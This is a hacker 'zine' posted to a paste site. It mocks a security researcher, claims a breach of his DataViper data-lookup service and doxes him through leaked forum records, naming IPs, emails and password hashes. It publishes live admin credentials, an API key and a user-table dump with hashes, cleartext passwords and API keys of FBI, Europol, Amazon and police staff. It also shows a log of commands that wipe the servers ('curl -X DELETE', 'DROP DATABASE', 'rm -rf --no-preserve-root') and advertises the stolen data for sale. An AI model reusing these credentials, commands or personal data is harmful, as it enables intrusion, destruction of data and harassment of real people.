____ _ _ | _ \ _____ _| |__ (_)_ __ | | | |/ _ \ \/ / '_ \| | '_ \ | |_| | (_) > <| |_) | | | | | |____/ \___/_/\_\_.__/|_|_| |_|
Title:Vinny Troia Zine
Created:Jul 17th, 2020
Created by: Anonymous
Views: 761
Comments: 0
Username: Anonymous - (Login)
Please note that all posted information is publicly available and must follow our TOS.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
_________________________
( ____ )\__ __/( ____ )
| ( )| ) ( | ( )|
| (____)| | | | (____)|
| __) | | | _____)
| (\ ( | | | (
| ) \ \_____) (___| )
|/ \__/\_______/|/
_________ _ _
|\ /|\__ __/( ( /|( ( /||\ /|
| ) ( | ) ( | \ ( || \ ( |( \ / )
| | | | | | | \ | || \ | | \ (_) /
( ( ) ) | | | (\ \) || (\ \) | \ /
\ \_/ / | | | | \ || | \ | ) (
\ / ___) (___| ) \ || ) \ | | |
\_/ \_______/|/ )_)|/ )_) \_/
_________ _______ _______ _________ _______
\__ __/( ____ )( ___ )\__ __/( ___ )
) ( | ( )|| ( ) | ) ( | ( ) |
| | | (____)|| | | | | | | (___) |
| | | __)| | | | | | | ___ |
__ | | | (\ ( | | | | | | | ( ) |
{OO} | | | ) \ \__| (___) |___) (___| ) ( |
\__/ )_( |/ \__/(_______)\_______/|/ \|
|^| h3h3 dataviper geddit? /\
| |_________________________________________________________________________/ /
\____________________________________________________________________________/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Who is Vinny Troia?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"You like bad techno, doxing children, trading stolen data, Supreme merch, and
hair gel . You can't investigate, you can't hack, and you don't know how to root
the gibson . Face it, you're never gonna make it ."
----
Vinny Troia is what I would call a security charlatan [1] . He calls himself an
"ethical hacker" and an "investigator" but doesn't have the skills to back it
up . He says he has a PhD but its from some shitty online university called
Capella University . His hacking knowledge doesn't extend beyond basic "OSINT"
which is skid hacker 101 stuff . Even then his OSINT leads him to hilariously
wrong conclusions as you can read in his "TDO investigation report" from this
leak . You can also read "Hunting Cyber Criminals" if you don't have a
HackForums account to read doxing tutorials . In order to make himself out to
be something he's not he latches onto other security researchers (and even
criminal hackers) to give himself credibility . He used Bob Diachenko during the
Elasticsearch breaches to make it seem like he has some technical knowhow but
it's obvious that Bob did all the heavy lifting for those . He took advantage of
Nclay's mental instability in order to promote himself and his business . Vinny
seems to think that he's doing some form of "undercover" work like he's a
"secret agent" but he is not a member of law enforcement and is often working
with the criminals he claims to be against . This has been his pattern of
behaviour since he became involved in the blackhat communities in 2017 under the
pseudonym "soundcard" where he was actively selling stolen data on the forum
KickAss [2] .
Let's not forget that even earlier in his career his services involved paying
ransoms to hackers (such as TDO) for companies in the event of a breach [3] .
He should have stuck with making bad techno music [4] .
[1] http://attrition.org/errata/charlatan/
[2] https://krebsonsecurity.com/2018/10/when-security-researchers-pose-as-cybercrooks-who-can-tell-the-difference/
[3] https://www.coindesk.com/coinbase-white-hat-hacker-dont-want-bitcoin/
[4] https://open.spotify.com/artist/1kFtnXoymZXUQv5K7T6GSN
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is DataViper?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DataViper is a data lookup site much like WeLeakInfo, LeakedSource and the
others that came before it . For some reason Vinny thinks he's above the law
here given that the aforementioned sites have all been shutdown or seized by
Law Enforcement . He will claim that he only gives access to organizations and
LE but if you look through the data he gave access to DDB ( a member of
GnosticPlayers [1] ) for several months ( August 27th 2019 to March 4th 2020 )[2]
during which time DDB hacked many more sites [3] . I suspect as part of this
relationship Vinny would get the data that DDB hacked in return which would make
him complicit in DDB's activities . If you go through the release list he has
most if not all the Gnosticplayers data as a result of his special relationship
with them . Unfortunately the DDB account was deleted before I compromised
DataViper and its search history erased so those logs are not available but it's
easy to imagine how useful this lookup would be to the ShinyHunters/Gnosticplayers
group as they mainly target developer Github accounts with password reuse .
He also gave access to other people from RaidForums and to the WeLeakInfo admin [4] .
[1] https://www.dataviper.io/blog/2019/gnosticplayers-part-1-nclay-ddb-nsfw/
[2] If you look in the DataViper production DB in the user_activity table for
references to DDB you can see that Vinny's account makes a lot of updates to the
profile details of DDB beginning in August 2019 and ending in March 2020 when he
deletes the DDB account .
[3] https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
[4] Look for moot@raid.lol and admin@weleakinfo.com in the user_activity table .
⠀⠀⠀⠀⣠⣦⣤⣀
⠀⠀⠀⠀⢡⣤⣿⣿
⠀⠀⠀⠀â ⠜⢾⡟
⠀⠀⠀⠀⠀⠹⠿⠃⠄
⠀⠀⠈⠀⠉⠉⠑⠀⠀â ⢈⣆
⠀⠀⣄⠀⠀⠀⠀⠀⢶⣷⠃⢵
â ⠰⣷⠀⠀⠀⠀⢀⢟⣽⣆⠀⢃
⠰⣾⣶⣤⡼⢳⣦⣤⣴⣾⣿⣿⠞
⠀⠈⠉⠉⠛⠛⠉⠉⠉⠙â
⠀⠀â¡â ˜â£¿â£¿â£¯â ¿â ›â£¿â¡„
⠀⠀â ⢀⣄⣄⣠⡥⠔⣻⡇
⠀⠀⠀⠘⣛⣿⣟⣖â¢â£¿â¡‡
⠀⠀⢀⣿⣿⣿⣿⣷⣿⣽⡇
⠀⠀⢸⣿⣿⣿⡇⣿⣿⣿⣇
⠀⠀⠀⢹⣿⣿⡀⠸⣿⣿â¡
⠀⠀⠀⢸⣿⣿⠇⠀⣿⣿⣿
⠀⠀⠀⠈⣿⣿⠀⠀⢸⣿⡿
⠀⠀⠀⠀⣿⣿⠀⠀⢀⣿⡇
⠀⣠⣴⣿⡿⠟⠀⠀⢸⣿⣷
⠀⠉⠉â ⠀⠀⠀⠀⢸⣿⣿â
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Elasticsearch "breaches"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
There have been multiple "breaches" that Vinny has reported on where it seems
like he is the only person outside the affected company who has the data . For
example, I have seen no evidence of Verifications.io or Apollo.io breaches being
in the hands of others . It is unethical in this situation to find these
exposed databases and harvest the data as a supposed security researcher and
then go on to include that data in a database lookup service . This hoser is
literally finding a vulnerability, exploiting that vulnerability by extracting
the data and then selling access to that data to others . There is not a bug
bounty program in existence that would allow you to dump all their data after
finding a vulnerability without pressing charges .
I don't know how he justifies leaking that data to get credit on hacking forums
either: https://raidforums.com/Thread-Verifications-io-200m-Happy-Holidays
I guess DataViper was just another unsecured Elasticsearch instance . 15 billion
records leaked by incompetent security company, how is that for a headline?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vinny's Hacking Aliases
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
It has been speculated that the threat actor "Exabyte" was Vinny although there
has been no formal evidence to back up these claims . Until now . After some
real investigation ( not the Vinny kind ) I was able to identify that Exabyte
shared an IP Address with a "Jessica Troia" [1][2] .
As you can see below, Jessica Troia and Exabyte either happened to be connected
to the same Starbucks wifi or Exabyte and Jessica Troia live in the same
household, I know which I believe to be more likely .
The fact that he is Exabyte is notable as this user has traded and sold data on
RaidForums as you can see from their posts and their reputation [3] . As
mentioned in the previous section Vinny also leaked data under this alias that
only he had access to [4] !
To further corroborate this link between Exabyte and Vinny I found two accounts
registered from that same IP address on two different hacking forums with the
name "nightlion" and email "thenightlion@protonmail.com" [5][6] .
"NightLion Security" is the name of Vinny's security company .
Bishop99 is another one of his aliases on RaidForums [7] . I know Bishop is
Vinny because he promotes DataViper on this account [8], got annoyed with
people who were leaking his book [9][10] and also pretty much admitted it [11] .
Some adventures he had on this account include trying to fundraise 24k$ to buy
hacked Instagram data [12], asked for advice on setting up a database lookup
( which would become DataViper ) [13] and getting scammed multiple times
attempting to purchase data [14][15] . He also leaked some databases under this
alias as well .
For fun I did some searches on DataViper and found that Vinny also recently
signed up to maza.la and lcp.cc with the username "Sandman" [16] .
[1] OGUsers.com, Breach Date: April 2020
User ID: 158805
Username: Exabyte
Email Address: exabyt3@pm.me
Registration IP Address: 47.34.65.210
Last Login IP Address: 145.239.207.11
MyBB Hash: c1502a4eac4e7df9d68969d362af787d
MyBB Salt: JHVp5fgy
[2] Houzz.com, Breach Date: March 2019
Username: jesstroia
Email Address: jessicatroia@gmail.com
IP Address: 47.34.65.210
SHA512Crypt Hash: \_\_SEC\_\_01R5fAC6cZwkKaYVwBz5Z5G/UC.yY7FA0pGFzz3ESaAmSm6G1BBAZmbaf39cMK8/ofzkgbluUhqvmD1S7Mn3RSaHkkYSuRgq88e3Uxf1
[3] https://raidforums.com/reputation.php?uid=121666013
[4] https://raidforums.com/Thread-Verifications-io-200m-Happy-Holidays
[5] DemonForums.com, Breach Date: February 2019
User ID: 32035
Username: nightlion
Email Address: thenightlion@protonmail.com
Registration IP Address: 47.34.65.210
Last Login IP Address: 47.34.65.210
MyBB Hash: bcf7ad0393b506065a329b97e6dec53e
MyBB Salt: A4ZponkV
[6] OGUsers.com, Breach Date: April 2020
User ID: 22916
Username: nightlion
Email Address: thenightlion@protonmail.com
Registration IP Address: 47.34.65.210
Last Login IP Address: 110.44.115.176
MyBB Hash: f1983818f063bd31d167127d7ad2d729
MyBB Salt: yIvVYOWf
[7] https://raidforums.com/User-Bishop99
[8] https://raidforums.com/Thread-NSFW-the-ruthless-piece-of-shit--80380?pid=1438543
[9] https://raidforums.com/Thread-Hunting-Cyber-Criminals-Vinny-Troia-Leaked?pid=1526177
[10] https://raidforums.com/Thread-Hunting-Cyber-Criminals-Vinny-Troia-FULL-BOOK?pid=1684264
[11] https://raidforums.com/Thread-BitMax-Crypto-DB-Exchange-Cracked-Dumped-By-AmIEdgyEnough?pid=1162299
[12] https://raidforums.com/Thread-Full-DOXAGRAM-Data-6-million-top-Instagram-accts-only-200
[13] https://raidforums.com/Thread-Importing-all-these-dumps-into-a-database
[14] https://raidforums.com/Thread-BANNED-Scam-Report-BigLadBigDog-aka-Silox-260
[15] https://raidforums.com/Thread-RESOLVED-Scam-Report-against-CrimeAgency-500--34765
[16] {
"_index" : "dvf-001",
"_source" : {
"forum" : "maza.la",
"pid" : "78019",
"subject" : "Newcomer: Sandman",
"author" : "support",
"message" : "ник: Sandman профили на других площадках:
raidforums.com/User-Exabyte lcp.cc - sandman verified - exabyte Вид
деÑтельноÑти - Продажа-покупка хакнутых баз.",
"date" : "1583557200.0"
}
}
Translation: "nickname: Sandman profiles on other sites:
raidforums.com/User-Exabyte lcp.cc - sandman verified - exabyte Kind of activity
- Sale-purchase of hacked bases"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The DataViper Hack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Don't piss off hackers"
- @VinnyTroia , December 2017 https://twitter.com/vinnytroia/status/943478765962842112
----
You might be wondering how DataViper was hacked [1] . At the present moment I
still have access to the DataViper servers and I think I will have access to
them for the foreseeable future so I will not be revealing the entry points in
this zine (but if you spot it in the source feel free to exploit it yourself) .
Just for a taste though you can look at the API docs [2] and scroll to the very
bottom where you can get a free API key
( KDWkI01TERFzFKYNYwKIjh1vXmCv1g9Z0fcCLEzgg4oA9aNZQLHfjaXlqZ3bqkonMcI3Zm7vWLVNs7UqWnBT7XGxBDaea02ozkIU )
and an admin login ( dvdevops : Data$Pank1t@38 ) .
I may release more details in a follow-up zine if circumstances change .
Access has been maintained for over 3 months and hundreds of GB of data was
exfiltrated without anyone noticing, even when he had to pay more money to
DigitalOcean for more bandwidth . Great endpoint protection you got there .
Let's check out the user table .
+------------------------------------------+------------------------------------+--------------------------------------------------------------+----------------+------------+-----------------+--------------------+------------------------------------------------------------------------------------------------------+
| email | username | password | clear_password | first_name | last_name | company | api_key |
+------------------------------------------+------------------------------------+--------------------------------------------------------------+----------------+------------+-----------------+--------------------+------------------------------------------------------------------------------------------------------+
| vinny@nightlionsecurity.com | dvadmin | $2y$10$mri/Q94sKcYcIiFpgRka0uX2rNzyrEfFuuQIJd3fv9saPa/buw.qW | | DV | Admin | | KfMWXrsoAQMwDa3NalhfApUrF3SkDSJFCOHm4ai1g6W3Ntoew5yWS6vzXfOnXcYY7lj6i9UXuQ1ymfUTxe0ER6tQxHK4edmcscMt |
| dev@dataviper.io | dvdevops | $2y$10$R16iIOVntzLK2XIt4ywTOOGguvOnw3qkkusNveRusa5S3fx9eRMGC | | | | | |
| bob@securitydiscovery.com | bob@securitydiscovery.com | $2y$10$CMyLR32HQyoJsjN54pubVO5muj7lnVVbdEVkGKAHkr4DWILpxeoc6 | BobV1p3rTmp001 | Bob | D | Security Discovery | |
| dharmeshbokadiya@knovator.in | Knovator | $2y$10$6HMfRPvA1GPemqJMrQpV3.WpXUgbfWTsNajVFxasboHBhri1RwzW. | | Knovator | Knovator | | |
| mvanderbunt@fbi.gov | mvanderbunt@fbi.gov | $2y$10$3ktEYHx6Rqn5t7i1hR3MRuGzl5qTluuFiDuY.Dq0leH4iql3MCoUK | | Marla | Vanderbunt | FBI | |
| jcran@intrigue.io | jcran@intrigue.io | $2y$10$470CcHy46M7iTlZTzA9aiOCelh2MoXKO9oJUMwPC0cMMHZTRjLdDu | | Jonathan | Cran | | |
| jedecapua@fbi.gov | jedecapua@fbi.gov | $2y$10$/L6DZ8NENey7FWEaViQ32ObMnzv.LcMSU8tO0.3lI9VYOCcmRAd0a | | Joel | Decapua | FBI | |
| Alexander.Gutwin@europol.europa.eu | Alexander.Gutwin@europol.europa.eu | $2y$10$lzSfJ.xWbFFjqFHGVqMMuOKnjO6azjY1jgJ4MwGpfH2P72kVkMic. | | Alexander | Gutwin | Europol | |
| Catarina.Nunes-Ladeira@europol.europa.eu | ep-cnl | $2y$10$/JFLHJw9OpSjeS4pedchaOXAb2gOxm5tBlQSc0KzZ/dW9TSr1mmFG | | Catarina | Nunes | Europol | UgUC8bc5DoNM7ZfQpq5vzR9rKCzryPYGpig8QvOKLdXVZvgBVUxbAmDLzWuKcwLkJz1GmSyHWxxpNXoSXpovkXIG2M93E5CRotVh |
| spfarr@amazon.com | spfarr@amazon.com | $2y$10$hL1dBQfClA5hyXtk4aZGGOo2baHKb0iGfDWWy4lxmpj4bd/Nqgiki | | Amazon | Trial1 | Amazon | eCaU1XRT8XHEcoOzBt972p1GGN2nrqCJPyVbsnpAaFSBZJ3SdzNVUuMswSrqRC4OtCkf0AhE9ROhZca2IqaPzj9xjtiu45oZ2guG |
| acflorin@amazon.com | acflorin@amazon.com | $2y$10$TVmeCUUXsSQIHErepdpule1apQoDqwNXrPj0gS0b64Qj5kcGK2kxO | | Alexandru | Florin-cristian | Amazon | R6UNy4dneojFH9y9S4tNFyk41XIoMz8zrVtU10jcSyzwJmbFj3UX37osh3YkFsEQzQRteeCUv7l1tr97JcLJ55bVesfrPQjDN4mU |
| heathcoa@amazon.com | heathcoa@amazon.com | $2y$10$xmZtij5LJdzkFnjLXXK9FubJtifYBUd9Eb76kbBHjii64IjSqlSAm | | Aric | Heathcoat | Amazon | XzxcdMyJ9Me6qz7nIMxdxMbkvwkS5XlqqmiprCdLu3KnEbpXYORi9wkTiXC7hnhgStBMMA6K2QyFTvkKE9GuC3HBB9FEBz4wxFDf |
| gdorton@amazon.com | gdorton@amazon.com | $2y$10$yQCIM2iV3GBQojaUIgjeVeSEFBdblDUMnQAZm3ZghVqhgcbIgHYHm | | Glen | Dorton | Amazon | LpIyRXBnsxFLXjduhDzjbziI6vzt1eVX9s7VI3wrK5uMeOFiW1Ve7VVWFUH0UN1WqyEqmtc2i8oKywG0ehYoigorWKvLm5T6AdNU |
| vonjason@amazon.com | vonjason@amazon.com | $2y$10$.qwMBZw1gNd1E2x7ajF5Su3z03J98grsuqmEGfmv17gMkonuOYD6W | | Jason | VonBargen | Amazon | V37Lyx0qXe2id8H4msZB5nW5EjIKHlo5mCY20YHlMgGbyFh7epPOCiTvmaNGyYoLeShWpWmBLZpLNLwUbSxoTVeZOjgzusCB7OxP |
| dgilich@amazon.com | dgilich@amazon.com | $2y$10$vImGAsjh4laLTmHvZgfJLOGjkBNC1uJGd1X3Jaa5pLpIOVvR/aX9C | V1p3i_72hChair | Denny | Gilich | Amazon | NUrCKMCWOzC512KI7VpKt1j6GeqEQDGVUov3iS5JHyMzHbjIHghZUWX54qV0unjWK2A20RJi5qXevxA8BQJ6FlJ1O9GP3HxmpJwj |
| psarosh@amazon.com | psarosh@amazon.com | $2y$10$5tVKpxNDFHX0nyydRuLFWOkTiKDj2MFbcLMcEaLe2Udk4oO13DA0G | V1p3i_72hChair | Sarosh | Petkar | Amazon | VaIro3Xu1egP6SqTZj1tQR2xF7DublIE1sweDCyygYBbAUsS8pAGLxFOAnzzFfez904OadG7gFroCGfmWpeVxGJgJpTfU2im9ETC |
| aalmarri@dubaipolice.gov.ae | aalmarri@dubaipolice.gov.ae | $2y$10$aeU2J3gxUYaDu6XlmRw52.u1tjGvKEbhpR0m5723CyJd9kMZZFwFq | | A | Almarri | Dubai Piolice | J1xEc4sMOzOT8kUNraWbbUAXjyfUIU2kugxuzrcOxinCInP8calWIec3l8r3B1lCvXCCS4wp1jAIDa5QDVedrWDgbKNqbVuGehrl |
| k.alhosani@dubaipolice.gov.ae | k.alhosani@dubaipolice.gov.ae | $2y$10$CZG9zN34Bu5Qscb/XIww7ef3ww2YrBlD2IVsDr7ZycWM9E7.LROM. | | Khalil | Hosani | Dubai Police | Xk85hkSbN2X8EF0dMobBehbudxPiMgdUzXyYZQZ8XnK6uspSTmy4kLkFAEk4YUeNbSkfDbu0wILhWueayOlsRCF4Ur6ehCzE4uxL |
| swamsley@protonmail.com | swamsley@protonmail.com | $2y$10$Y.gXhSnME8xyIKUhcXlfgOQBp8KNd9YpFce6Eol8qpW/40vKJOhyO | | Steve | Wamsley | Data VIper | vXI3bXqdR8IxunpcZ3FAXKMQVrpoIaRbaE3FB35zB9TZyH6ELaoNQzepHtJTgAEGMRpsYxaXUpCEOvJn3O0Ect44v5pobtGnMpjZ |
| scraper@dataviper.io | scraper | $2y$10$cPJcysp4t9ag2rLdpspyg.kois9auHNpGAIlrPToq3PVK/5X5mCP6 | | Scraper | User | Data Viper | JTlig7BrLyKfJYN3XJuK8NyfroQALGlvsuc37QU0ijsq6EKQJxIbP0aoMEEe2AzlnZCFRs1xegC1rlvEu52i3yX7tF7hUFmNjasw |
| aheid@securityscorecard.io | aheid@securityscorecard.io | $2y$10$pohlZEeWKg6hQq5k0XCKqeVJOnamL0Uo13d6/WJtIvJIqlH58FxLC | | Alex | Heid | SSC | 5UMzgfpPa2J0Ni7sS1sWaazLd63LxgTBBMlhLk4cVE1toyFrfRyhUlartcleXYuJF8EPXUSPTpjejN70h2bAnmjb38iRPDIiBkdJ |
| provider.zestgeek@gmail.com | provider.zestgeek@gmail.com | $2y$10$clwQSjE6JgjiAK85fU4l2ePujBQLyBaqylnLIVEei0XxytqWwsx8W | | Zestgeek | Developer | Zestgeek | N8njywhkhBzOG5C2XqzDzy7txYRCpVc0dw7sxnfxOeMfH2jVRTaxUOvTMjejxHZ9p7DR0ebpFWyrBDQvKzaA35flsXsQUxN6oiSe |
| sp@nightlionsecurity.com | sp@nightlionsecurity.com | $2y$10$kAaOKWJKZ5jUN.t71Nd5MeaSIKb0Ycfz/53HDV9EwQcEXTUXL/F3S | | Shweta | Patel | Night Lion | g9ub4uDFYSGbkRqz3IMIjyl6hv0oYsqlG5OIrt4fOV6faffHKhwIterTVU6wttJyyKIQirv0HkO5KhMo6uBbu8jNealRnKWHPXXb |
+------------------------------------------+------------------------------------+--------------------------------------------------------------+----------------+------------+-----------------+--------------------+------------------------------------------------------------------------------------------------------+
Look at that handy clear_password column ! #secure
Only two users changed passwords during the timespan of the breach .
+------------------------------------------+------------------------------------+--------------------------------------------------------------+------------+------------+
| email | username | password | first_name | last_name |
+------------------------------------------+------------------------------------+--------------------------------------------------------------+------------+------------+
| jedecapua@fbi.gov | jedecapua@fbi.gov | $2y$10$qloFWkJcrcTn75EgswavTuB5SGxcamiZJiRllWFQL2uMdNeSvKUwW | Joel | Decapua |
| Catarina.Nunes-Ladeira@europol.europa.eu | ep-cnl | $2y$10$PxdkXxa7lkkFaEwKOLt5D.51qlbfXGMgv1F/sxFOHeEqouFHEMRJy | Catarina | Nunes |
+------------------------------------------+------------------------------------+--------------------------------------------------------------+------------+------------+
They also recorded the searches in their DB so you check out the SQL if you're
interested in that .
[1] https://app.dataviper.io/proof.txt ( https://web.archive.org/web/20200709132020/https://app.dataviper.io/proof.txt )
[2] https://apidocs.dataviper.io/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Analysis of "Investigation Report"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
On the DataViper server I got a copy of the "Investigation Report" that Vinny
has been working on . Please note that the copy in this leak is from December
2019 and may not be exactly the same as what he intends to release but I imagine
it's very similar . I am not going to do a full review of it as it is genuinely
a disorganized mess but I'll bring up some points here .
At many points he fails to substantiate his claims or the links between aliases .
Page 13: "it was revealed that all communication was run through a PHP-based
translator."
What does he mean here? The chat log immediately after doesn't show this and
later he claims all TDO members are first-language English speakers anyway .
Page 29: "This threat actor likes to create confusion and deception by stealing
the handles of known hackers."
And Vinny takes it hook, line, and sinker and just believes they're all the same
person . He consciously knows this and yet released this ridiculous report !
Take note that he will also use this line of thinking to dismiss any evidence to
the contrary of his theory at multiple points in his "report" .
Page 42
Vinny thinks ROR[RG] and F3ttywap are shared aliases when they're not . It is
extremely unlikely any of these actors share aliases other than the over-arching
labels e.g. TDO .
I find it really hilarious that Vinny thinks Peace of Mind is somehow this 19
year old kid from Calgary . I know that Peace of Mind didn't hack the sites he
sold but still, they were mainly from 2012 . He was at least in contact with
those who did . This Christopher kid would have been 11 or 12 years old at the
time . Do you really think he would have had contact with the same people?
Another thing to mention, why are you leaking this kid's phone number? What
purpose does that serve to the public? How sure are you that this kid is who you
say he is?
Again this reads more like a skiddy dox than a professional report .
Vinny thinks NSA (Christopher Meunier) and Cyper are different people but are
also the same . Again just more confusion in this report .
Page 67 ignores the fact that KickAss had coding challenges in place for new
members which is probably where these code samples originate . They are also
small simple code samples which means code stylometry will be a lot less
accurate on them .
Leave the cybercrime investigations to the FBI kid .
If you want to read a proper OSINT report I would recommend either Bellingcat [1]
or RecordedFuture [2] . They do a much better job .
[1] https://www.bellingcat.com/category/resources/case-studies/
[2] https://www.recordedfuture.com/tessa88-identity-revealed/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Other data breaches
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DataViper contained several undisclosed breaches . MGM Grand Hotels is included
in the dataset with 142 million entries and was imported by Vinny on November
30th 2019 . This number is very different to the 10.7 million number that they
stated were affected [1] . This indicates that MGM knowingly misreported
information regarding this data breach and that Vinny is aware of this
misrepresentation .
FiveStars is another data breach that is in DataViper but not publicly disclosed .
It was imported in November 2019 . It is unclear where it was reported to them
and they failed to notify their users or if Vinny did not notify FiveStars .
The same is true of Zumiez.com (160 million), Avito.ru (30 million),
Mamba.ru (13 million), MyVestige.com (11 million), LocateFamily.com (11 million),
and others .
[1] https://www.zdnet.com/article/exclusive-details-of-10-6-million-of-mgm-hotel-guests-posted-on-a-hacking-forum/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Destruction
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
root@app:~$ curl -X DELETE "http://node1:9200/dvf-001"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/dvp-001"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/dvp-002"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/dvp-003"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/.elastichq"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/dv-n208"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/dv-n207"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/dv-n206"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/dv-n205"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/dv-n204"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/dv-n203"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/.kibana_task_manager_1
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/dv-n103"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/dv-n202"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/dv-n201"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/dv-n102"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/dv-dev"
on"cknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/.apm-agent-configurati
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/dv-n101"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/.kibana_2"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/.kibana_1"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/.kibana_3"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/.tasks"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/dv-i002"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/paste-001"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/dv-i001"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/dev-forums"
{"acknowledged":true}
root@app:~$ curl -X DELETE "http://node1:9200/reindexed-v7-dataviper
{"acknowledged":true}
root@app:~$ curl 51.79.99.83:9200/_cat/indices?v
health status index uuid pri rep docs.count docs.deleted store.size pri.store.size
root@app:~$ mysql -u viperwebadmin -pVipSQL00dh8yo -e "DROP DATABASE viperdev;DROP DATABASE viperusers;DROP DATABASE viperwp; DROP DATABASE mysql;"
root@app:~$ cd /
root@app:/$ rm -rf --no-preserve-root * 2>&1
root@app:/$
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Conclusions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well I hope you all enjoyed this read, it's been a while since we've had a good
zine, eh ? I wonder if Vinny will notify all 15 billion victims of this data
breach . I have attached my PGP key and signed this document with it . You can
use this key to verify any future releases or whether you are talking to me or
some scammer/security charlatan .
If you wish to send me interesting things for a follow-up zine ( chat logs, BTC
transactions, etc ) you can email me at nightlionleak@protonmail.com . Include a
PGP key if you want a response .
I am selling a lot of the data from DataViper's servers on Empire Market . You
can visit my profile here to purchase the data:
http://erj7kwqkdkl73ewsuq6stztehx2tehk2aidxlex3btrfnjqax3ucvgyd.onion/u/NightLion
I am also leaking DataVipers source, DB and some other data here:
http://fuvinnyziawisxgaetgrchidifxk377jdkqj56baqfsxbwkjmg24oeqd.onion
See you around,
NightLion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
gr33tz to H0N0, RiskyBiz, Ac1dB1tch3z, floorgang, HQS, Brian "The Krebinator"
Krebs, el8, HTP, the Akina Speedstars, RaidForums, fridge botnet owners,
SleeperS Crew, Lulzsec, Phineas Fisher, Troy Hunt
FUCK VINNY TROIA
FUCK THE FEDERAL RESERVE
#BLACKLIVESMATTER
#FREEPALESTINE
#HUNTINGCYBERCRIMINALS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
My PGP Key
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- -----BEGIN PGP PUBLIC KEY BLOCK-----
